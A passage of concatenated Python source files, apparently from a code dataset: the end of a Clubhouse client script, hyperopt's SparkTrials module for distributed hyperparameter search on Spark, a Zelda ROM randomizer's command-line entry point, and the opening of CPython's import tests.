chat_main(client)
else:
client = Clubhouse()
user_authentication(client)
main()
if __name__ == "__main__":
try:
main()
except Exception:
# Remove dump files on exit.
file_list = os.listdir(".")
for _file in file_list:
if _file.endswith(".dmp"):
os.remove(_file)
|
spark.py
|
import copy
import threading
import time
import timeit
import traceback
from hyperopt import base, fmin, Trials
from hyperopt.base import validate_timeout, validate_loss_threshold
from hyperopt.utils import coarse_utcnow, _get_logger, _get_random_id
from py4j.clientserver import ClientServer
try:
from pyspark.sql import SparkSession
from pyspark.util import VersionUtils
import pyspark
_have_spark = True
_spark_major_minor_version = VersionUtils.majorMinorVersion(pyspark.__version__)
except ImportError as e:
_have_spark = False
_spark_major_minor_version = None
logger = _get_logger("hyperopt-spark")
class SparkTrials(Trials):
"""
Implementation of hyperopt.Trials supporting
distributed execution using Apache Spark clusters.
This requires fmin to be run on a Spark cluster.
Plugging SparkTrials into hyperopt.fmin() allows hyperopt
to send model training and evaluation tasks to Spark workers,
parallelizing hyperparameter search.
Each trial (set of hyperparameter values) is handled within
a single Spark task; i.e., each model will be fit and evaluated
on a single worker machine. Trials are run asynchronously.
See hyperopt.Trials docs for general information about Trials.
The fields we store in our trial docs match the base Trials class. The fields include:
- 'tid': trial ID
- 'state': JOB_STATE_DONE, JOB_STATE_ERROR, etc.
- 'result': evaluation result for completed trial run
- 'refresh_time': timestamp for last status update
- 'misc': includes:
- 'error': (error type, error message)
- 'book_time': timestamp for trial run start
"""
asynchronous = True
# Hard cap on the number of concurrent hyperopt tasks (Spark jobs) to run. Set at 128.
MAX_CONCURRENT_JOBS_ALLOWED = 128
def __init__(
self, parallelism=None, timeout=None, loss_threshold=None, spark_session=None
):
"""
:param parallelism: Maximum number of parallel trials to run,
i.e., maximum number of concurrent Spark tasks.
The actual parallelism is subject to available Spark task slots at
runtime.
If set to None (default) or a non-positive value, this will be set to
Spark's default parallelism or `1`.
We cap the value at `MAX_CONCURRENT_JOBS_ALLOWED=128`.
:param timeout: Maximum time (in seconds) which fmin is allowed to take.
If this timeout is hit, then fmin will cancel running and proposed trials.
It will retain all completed trial runs and return the best result found
so far.
:param spark_session: A SparkSession object. If None is passed, SparkTrials will attempt
to use an existing SparkSession or create a new one. SparkSession is
the entry point for various facilities provided by Spark. For more
information, visit the documentation for PySpark.
"""
super().__init__(exp_key=None, refresh=False)
if not _have_spark:
raise Exception(
"SparkTrials cannot import pyspark classes. Make sure that PySpark "
"is available in your environment. E.g., try running 'import pyspark'"
)
validate_timeout(timeout)
validate_loss_threshold(loss_threshold)
self._spark = (
SparkSession.builder.getOrCreate()
if spark_session is None
else spark_session
)
self._spark_context = self._spark.sparkContext
self._spark_pinned_threads_enabled = isinstance(
self._spark_context._gateway, ClientServer
)
# The feature to support controlling jobGroupIds is in SPARK-22340
self._spark_supports_job_cancelling = (
self._spark_pinned_threads_enabled
or hasattr(self._spark_context.parallelize([1]), "collectWithJobGroup")
)
spark_default_parallelism = self._spark_context.defaultParallelism
self.parallelism = self._decide_parallelism(
requested_parallelism=parallelism,
spark_default_parallelism=spark_default_parallelism,
)
if not self._spark_supports_job_cancelling and timeout is not None:
logger.warning(
"SparkTrials was constructed with a timeout specified, but this Apache "
"Spark version does not support job group-based cancellation. The "
"timeout will be respected when starting new Spark jobs, but "
"SparkTrials will not be able to cancel running Spark jobs which exceed"
" the timeout."
)
self.timeout = timeout
self.loss_threshold = loss_threshold
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
self.refresh()
@staticmethod
def _decide_parallelism(requested_parallelism, spark_default_parallelism):
"""
Given the requested parallelism, return the max parallelism SparkTrials will actually use.
See the docstring for `parallelism` in the constructor for expected behavior.
"""
if requested_parallelism is None or requested_parallelism <= 0:
parallelism = max(spark_default_parallelism, 1)
logger.warning(
"Because the requested parallelism was None or a non-positive value, "
"parallelism will be set to ({d}), which is Spark's default parallelism ({s}), "
"or 1, whichever is greater. "
"We recommend setting parallelism explicitly to a positive value because "
"the total of Spark task slots is subject to cluster sizing.".format(
d=parallelism, s=spark_default_parallelism
)
)
else:
parallelism = requested_parallelism
if parallelism > SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED:
logger.warning(
"Parallelism ({p}) is capped at SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED ({c}).".format(
p=parallelism, c=SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
)
)
parallelism = SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
return parallelism
def count_successful_trials(self):
"""
Returns the current number of trials which ran successfully
"""
return self.count_by_state_unsynced(base.JOB_STATE_DONE)
def count_failed_trials(self):
"""
Returns the current number of trial runs which failed
"""
return self.count_by_state_unsynced(base.JOB_STATE_ERROR)
def count_cancelled_trials(self):
"""
Returns the current number of cancelled trial runs.
This covers trials which are cancelled from exceeding the timeout.
"""
return self.count_by_state_unsynced(base.JOB_STATE_CANCEL)
def count_total_trials(self):
"""
Returns the current number of all successful, failed, and cancelled trial runs
"""
total_states = [
base.JOB_STATE_DONE,
base.JOB_STATE_ERROR,
base.JOB_STATE_CANCEL,
]
return self.count_by_state_unsynced(total_states)
def delete_all(self):
"""
Reset the Trials to init state
"""
super().delete_all()
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
def trial_attachments(self, trial):
raise NotImplementedError("SparkTrials does not support trial attachments.")
def fmin(
self,
fn,
space,
algo,
max_evals,
timeout,
loss_threshold,
max_queue_len,
rstate,
verbose,
pass_expr_memo_ctrl,
catch_eval_exceptions,
return_argmin,
show_progressbar,
early_stop_fn,
trials_save_file="",
):
"""
This should not be called directly but is called via :func:`hyperopt.fmin`
Refer to :func:`hyperopt.fmin` for docs on each argument
"""
if timeout is not None:
if self.timeout is not None:
logger.warning(
"Timeout param was defined in Trials object, ignoring fmin definition"
)
else:
validate_timeout(timeout)
self.timeout = timeout
if loss_threshold is not None:
validate_loss_threshold(loss_threshold)
self.loss_threshold = loss_threshold
assert (
not pass_expr_memo_ctrl
), "SparkTrials does not support `pass_expr_memo_ctrl`"
assert (
not catch_eval_exceptions
), "SparkTrials does not support `catch_eval_exceptions`"
state = _SparkFMinState(self._spark, fn, space, self)
# Will launch a dispatcher thread which runs each trial task as one spark job.
state.launch_dispatcher()
try:
res = fmin(
fn,
space,
algo,
max_evals,
timeout=timeout,
loss_threshold=loss_threshold,
max_queue_len=max_queue_len,
trials=self,
allow_trials_fmin=False, # -- prevent recursion
rstate=rstate,
pass_expr_memo_ctrl=None, # not supported
catch_eval_exceptions=catch_eval_exceptions,
verbose=verbose,
return_argmin=return_argmin,
points_to_evaluate=None, # not supported
show_progressbar=show_progressbar,
early_stop_fn=early_stop_fn,
trials_save_file="", # not supported
)
except BaseException as e:
logger.debug("fmin thread exits with an exception raised.")
raise e
else:
logger.debug("fmin thread exits normally.")
return res
finally:
state.wait_for_all_threads()
logger.info(
"Total Trials: {t}: {s} succeeded, {f} failed, {c} cancelled.".format(
t=self.count_total_trials(),
s=self.count_successful_trials(),
f=self.count_failed_trials(),
c=self.count_cancelled_trials(),
)
)
class _SparkFMinState:
"""
Class for managing threads which run concurrent Spark jobs.
This maintains a primary dispatcher thread, plus 1 thread per Hyperopt trial.
Each trial's thread runs 1 Spark job with 1 task.
"""
def __init__(self, spark, eval_function, space, trials):
self.spark = spark
self.eval_function = eval_function
self.space = space
self.trials = trials
self._fmin_done = False
self._dispatcher_thread = None
self._task_threads = set()
if self.trials._spark_supports_job_cancelling:
spark_context = spark.sparkContext
self._job_group_id = spark_context.getLocalProperty("spark.jobGroup.id")
self._job_desc = spark_context.getLocalProperty("spark.job.description")
interrupt_on_cancel = spark_context.getLocalProperty(
"spark.job.interruptOnCancel"
)
if interrupt_on_cancel is None:
self._job_interrupt_on_cancel = False
else:
self._job_interrupt_on_cancel = "true" == interrupt_on_cancel.lower()
# In certain Spark deployments, the local property "spark.jobGroup.id"
# value is None, so we create one to use for SparkTrials.
if self._job_group_id is None:
self._job_group_id = "Hyperopt_SparkTrials_" + _get_random_id()
if self._job_desc is None:
self._job_desc = "Trial evaluation jobs launched by hyperopt fmin"
logger.debug(
"Job group id: {g}, job desc: {d}, job interrupt on cancel: {i}".format(
g=self._job_group_id,
d=self._job_desc,
i=self._job_interrupt_on_cancel,
)
)
def running_trial_count(self):
return self.trials.count_by_state_unsynced(base.JOB_STATE_RUNNING)
@staticmethod
def _begin_trial_run(trial):
trial["state"] = base.JOB_STATE_RUNNING
now = coarse_utcnow()
trial["book_time"] = now
trial["refresh_time"] = now
logger.debug("trial task {tid} started".format(tid=trial["tid"]))
@staticmethod
def _get_traceback(err):
return err.__dict__.get("_tb_str")
def _finish_trial_run(self, is_success, is_cancelled, trial, data):
"""
Call this method when a trial evaluation finishes. It will save results to the
trial object and update task counters.
:param is_success: whether the trial succeeded
:param is_cancelled: whether the trial was cancelled
:param data: If the trial succeeded, this is the return value from the trial
task function. Otherwise, this is the exception raised when running the trial
task.
"""
if is_cancelled:
logger.debug(
"trial task {tid} cancelled, exception is {e}".format(
tid=trial["tid"], e=str(data)
)
)
self._write_cancellation_back(trial, e=data)
elif is_success:
logger.debug(
"trial task {tid} succeeded, result is {r}".format(
tid=trial["tid"], r=data
)
)
self._write_result_back(trial, result=data)
else:
logger.error(
"trial task {tid} failed, exception is {e}.\n {tb}".format(
tid=trial["tid"], e=str(data), tb=self._get_traceback(data)
)
)
self._write_exception_back(trial, e=data)
def launch_dispatcher(self):
def run_dispatcher():
start_time = timeit.default_timer()
while not self._fmin_done:
new_tasks = self._poll_new_tasks()
for trial in new_tasks:
self._run_trial_async(trial)
cur_time = timeit.default_timer()
elapsed_time = cur_time - start_time
# In the future, timeout checking logic could be moved to `fmin`.
# For now, timeouts are specific to SparkTrials.
# When a timeout happens:
# - Set `trials._fmin_cancelled` flag to be True.
# - FMinIter checks this flag and exits if it is set to True.
if (
self.trials.timeout is not None
and elapsed_time > self.trials.timeout
and not self.trials._fmin_cancelled
):
self.trials._fmin_cancelled = True
self.trials._fmin_cancelled_reason = "fmin run timeout"
self._cancel_running_trials()
logger.warning(
"fmin cancelled because of "
+ self.trials._fmin_cancelled_reason
)
time.sleep(1)
if self.trials._fmin_cancelled:
# Because cancelling fmin triggered, warn that the dispatcher won't launch
# more trial tasks.
logger.warning("fmin is cancelled, so new trials will not be launched.")
logger.debug("dispatcher thread exits normally.")
self._dispatcher_thread = threading.Thread(target=run_dispatcher)
self._dispatcher_thread.setDaemon(True)
self._dispatcher_thread.start()
@staticmethod
def _get_spec_from_trial(trial):
return base.spec_from_misc(trial["misc"])
@staticmethod
def _write_result_back(trial, result):
trial["state"] = base.JOB_STATE_DONE
trial["result"] = result
trial["refresh_time"] = coarse_utcnow()
def _write_exception_back(self, trial, e):
trial["state"] = base.JOB_STATE_ERROR
trial["misc"]["error"] = (str(type(e)), self._get_traceback(e))
trial["refresh_time"] = coarse_utcnow()
@staticmethod
def _write_cancellation_back(trial, e):
trial["state"] = base.JOB_STATE_CANCEL
trial["misc"]["error"] = (str(type(e)), str(e))
trial["refresh_time"] = coarse_utcnow()
def _run_trial_async(self, trial):
def finish_trial_run(result_or_e):
if not isinstance(result_or_e, BaseException):
self._finish_trial_run(
is_success=True,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread exits normally and writes results "
"back correctly.".format(tid=trial["tid"])
)
else:
self._finish_trial_run(
is_success=False,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread catches an exception and writes the "
"info back correctly.".format(tid=trial["tid"])
)
def run_task_thread():
local_eval_function, local_space = self.eval_function, self.space
params = self._get_spec_from_trial(trial)
def run_task_on_executor(_):
domain = base.Domain(
local_eval_function, local_space, pass_expr_memo_ctrl=None
)
try:
result = domain.evaluate(
params, ctrl=None, attach_attachments=False
)
yield result
except BaseException as e:
# Because the traceback is not pickable, we need format it and pass it back
# to driver
_traceback_string = traceback.format_exc()
logger.error(_traceback_string)
e._tb_str = _traceback_string
yield e
try:
worker_rdd = self.spark.sparkContext.parallelize([0], 1)
if self.trials._spark_supports_job_cancelling:
if self.trials._spark_pinned_threads_enabled:
spark_context = self.spark.sparkContext
spark_context.setLocalProperty(
"spark.jobGroup.id", self._job_group_id
)
spark_context.setLocalProperty(
"spark.job.description", self._job_desc
)
spark_context.setLocalProperty(
"spark.job.interruptOnCancel",
str(self._job_interrupt_on_cancel).lower(),
)
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collectWithJobGroup(
self._job_group_id,
self._job_desc,
self._job_interrupt_on_cancel,
)[
0
]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
except BaseException as e:
# I recommend to catch all exceptions here, it can make the program more robust.
# There're several possible reasons lead to raising exception here.
# so I use `except BaseException` here.
#
# If cancelled flag is set, it represent we need to cancel all running tasks,
# Otherwise it represent the task failed.
finish_trial_run(e)
else:
# The exceptions captured in run_task_on_executor would be returned in the result_or_e
finish_trial_run(result_or_e)
if self.trials._spark_pinned_threads_enabled:
try:
# pylint: disable=no-name-in-module,import-outside-toplevel
from pyspark import inheritable_thread_target
run_task_thread = inheritable_thread_target(run_task_thread)
except ImportError:
pass
task_thread = threading.Thread(target=run_task_thread)
task_thread.setDaemon(True)
task_thread.start()
self._task_threads.add(task_thread)
def _poll_new_tasks(self):
new_task_list = []
for trial in copy.copy(self.trials.trials):
if trial["state"] == base.JOB_STATE_NEW:
# check parallelism limit
if self.running_trial_count() >= self.trials.parallelism:
break
new_task_list.append(trial)
self._begin_trial_run(trial)
return new_task_list
def _cancel_running_trials(self):
if self.trials._spark_supports_job_cancelling:
logger.debug(
"Cancelling all running jobs in job group {g}".format(
g=self._job_group_id
)
)
self.spark.sparkContext.cancelJobGroup(self._job_group_id)
# Make a copy of trials by slicing
for trial in self.trials.trials[:]:
if trial["state"] in [base.JOB_STATE_NEW, base.JOB_STATE_RUNNING]:
trial["state"] = base.JOB_STATE_CANCEL
else:
logger.info(
"Because the current Apache PySpark version does not support "
"cancelling jobs by job group ID, SparkTrials will block until all of "
"its running Spark jobs finish."
)
def wait_for_all_threads(self):
"""
Wait for the dispatcher and worker threads to finish.
:param cancel_running_trials: If true, try to cancel all running trials.
"""
self._fmin_done = True
self._dispatcher_thread.join()
self._dispatcher_thread = None
for task_thread in self._task_threads:
task_thread.join()
self._task_threads.clear()
|
main.py
|
import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import spoilerLog
import re
from argparse import ArgumentParser, ArgumentTypeError
def goal(goal):
if goal == "random":
goal = "-1-8"
elif goal in ["seashells", "raft", "bingo", "bingo-full"]:
return goal
m = re.match(r'^(-?\d|open)(?:-(\d))?$', goal)
if not m:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (open, 0, 1, 2 ... 8), a range (open-6, 1-4, 5-8, ...) or 'seashells' / 'raft'.")
start = m.group(1)
if start == "open":
start = "-1"
start = int(start)
end = m.group(2) or start
end = int(end)
if start < -1 or start > 8 or end < -1 or end > 8:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
if end == start:
return start
elif end < start:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
return range(start, end+1)
# Check if the current mix of options is valid, and fix incompatible selected options
def validateOptions(options):
def req(setting, value, message):
if getattr(options, setting) != value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, value)
def dis(setting, value, new_value, message):
if getattr(options, setting) == value:
print("Warning: %s (setting adjusted automatically)" % message)
setattr(options, setting, new_value)
if options.goal in ("bingo", "bingo-full"):
req("overworld", "normal", "Bingo goal does not work with dungeondive")
req("accessibility_rule", "all", "Bingo goal needs 'all' accessibility")
dis("steal", "never", "default", "With bingo goal, stealing should be allowed")
dis("boss", "random", "shuffle", "With bingo goal, bosses need to be on normal or shuffle")
dis("miniboss", "random", "shuffle", "With bingo goal, minibosses need to be on normal or shuffle")
if options.overworld == "dungeondive":
dis("goal", "seashells", "8", "Dungeon dive does not work with seashell goal")
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", type=str, nargs="*",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
parser.add_argument('--logdirectory', dest="log_directory", type=str, required=False,
help="Directory to write the JSON log file. Generated independently from the spoiler log and omitted by default.")
# Flags that effect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["casual", "normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--dungeon-items', dest="dungeon_items", choices=['standard', 'localkeys', 'localnightmarekey', 'smallkeys', 'keysanity', 'keysy'], default='standard',
help="Sets what gets done with dungeon items, if they are in their own dungeon or not.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--entranceshuffle', dest="entranceshuffle", choices=["none", "simple", "advanced", "expert", "insanity"], default="none",
help="Enable entrance shuffle, shuffles around overworld entrances.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--doubletrouble', dest="doubletrouble", action="store_true",
help="Warning, bugged in various ways")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--rooster', dest="rooster", action="store_true",
help="Adds rooster to the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1', 'low', 'extralow'], default='default',
help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", choices=["none", "oracle", "hero", "ohko"], default="none",
help="Make the game a bit harder. [oracle] less health from drops, bombs damage yourself, and less iframes. [hero] Double damage, no heart/fairy drops. [ohko] One hit KO.")
parser.add_argument('--superweapons', dest="superweapons", action="store_true",
help="Make all weapons/inventory more powerful.")
parser.add_argument('--goal', dest="goal", type=goal, default='8',
help="Configure the instrument goal for this rom: any number between -1 (open egg) and 8, a range (e.g. 4-7), 'random', or 'raft' / 'seashells' / 'bingo' for special goals.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal',
help="Allows switching to the dungeondive overworld, where there are only dungeons.")
parser.add_argument('--pymod', dest="pymod", action='append',
help="Load python code mods.")
# Just aestetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--remove-flashing-lights', dest="removeFlashingLights", action="store_true",
help="Remove the flashing light effects from mamu, the shopkeeper and madbatter.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
parser.add_argument('--music', dest="music", choices=['default', 'random', 'off'], default='default',
help="Randomizes or disable the music")
args = parser.parse_args(mainargs)
validateOptions(args)
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string),
namespace=argparse.Namespace(**vars(args)))
validateOptions(args.multiworld_options[index])
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
import worldSetup
iteminfo_list = logic.Logic(args, world_setup=worldSetup.WorldSetup()).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump is not None or args.test:
print("Loading: %s" % (args.input_filename))
roms = [ROMWithTables(f) for f in [args.input_filename] + args.dump]
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, roms)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
if args.seed:
try:
args.seed = binascii.unhexlify(args.seed)
except binascii.Error:
args.seed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=args.seed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if args.seed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
|
__init__.py
|
import builtins
import contextlib
import errno
import glob
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import marshal
import os
import py_compile
import random
import shutil
import stat
import subprocess
import sys
import textwrap
import threading
import time
import unittest
from unittest import mock
from test.support import os_helper
from test.support import (is_jython, swap_attr, swap_item, cpython_only)
from test.support.import_helper import (
forget, make_legacy_pyc, unlink, unload, DirsOnSysPath)
from test.support.os_helper import (
TESTFN, rmtree, temp_umask, TESTFN_UNENCODABLE, temp_dir)
from test.support import script_helper
from test.support import threading_helper
from test.test_importlib.util import uncache
from types import ModuleType
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w', encoding='utf-8') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w', encoding='utf-8') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w", encoding='utf-8') as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
